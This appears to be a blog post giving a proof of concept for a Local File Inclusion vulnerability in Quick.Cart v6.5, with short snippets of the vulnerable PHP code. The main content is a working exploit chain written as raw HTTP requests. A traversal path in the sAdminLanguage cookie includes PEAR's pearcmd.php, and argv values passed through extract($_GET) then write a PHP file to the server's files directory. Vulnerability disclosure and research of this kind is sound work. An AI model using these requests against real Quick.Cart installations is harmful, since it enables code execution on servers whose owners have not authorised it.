POC - Quick.Cart v6.5 - Local File Inclusion
[LFI] Quick.Cart v6.5
admin.php::
... SNIP ...
extract( $_GET );
define( 'ADMIN_PAGE', true );
... SNIP ...
Funny, passing user input directly to extract x) --- We will need this later...
admin.php::
... SNIP ...
require 'database/config/general.php';
... SNIP ...
Lets digg here :p
database/config/general.php::
... SNIP ...
$config['change_language_to_polish'] = true;
if( !defined( 'CUSTOMER_PAGE' ) &&
!empty( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) &&
$config['change_language_to_polish'] === true &&
preg_match( '/pl-|pl,|^pl$/', $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {
... SNIP ...
if( isset( $_COOKIE['sAdminLanguage'] ) )
$config['admin_lang']= $_COOKIE['sAdminLanguage'];
... SNIP ...
require_once defined( 'CUSTOMER_PAGE' ) ? $config['dir_lang'].LANGUAGE.'.php' : ( is_file( $config['dir_lang'].$config['admin_lang'].'.php' ) ? $config['dir_lang'].$config['admin_lang'].'.php' : $config['dir_lang'].LANGUAGE.'.php' );
... SNIP ...
1. in "admin.php" CUSTOMER_PAGE is not defined
2. we can set the header "Accept-Language: pl-PL,pl;"
3. we control the cookies too
Means!
$config['admin_lang'] is controlled :D
So, we can include any file ends ".php"
The file address must be a real file (is_file) -_-"
Actually nothing good todo...
maybe we can use PEAR sources :p
GET /qcv56/admin.php HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;
Well done ... lets use the "extract($_GET)" to pass arguments to PEAR
-s -c ./files/83f2a5ec3fca.php -d preferred_mirror="<?php phpinfo() ?>"
tricky :p ...
GET /qcv56/admin.php?argv[]=&argv[]=-s&argv[]=-c&argv[]=./files/83f2a5ec3fca.php&argv[]=-dpreferred_mirror=<?php%20phpinfo()%20?> HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;
GET /qcv56/files/83f2a5ec3fca.php HTTP/1.1
Host: 127.0.0.1
Connection: close
file created :)
Subscribe to:
Comments
(
Atom
)
No comments :
Post a Comment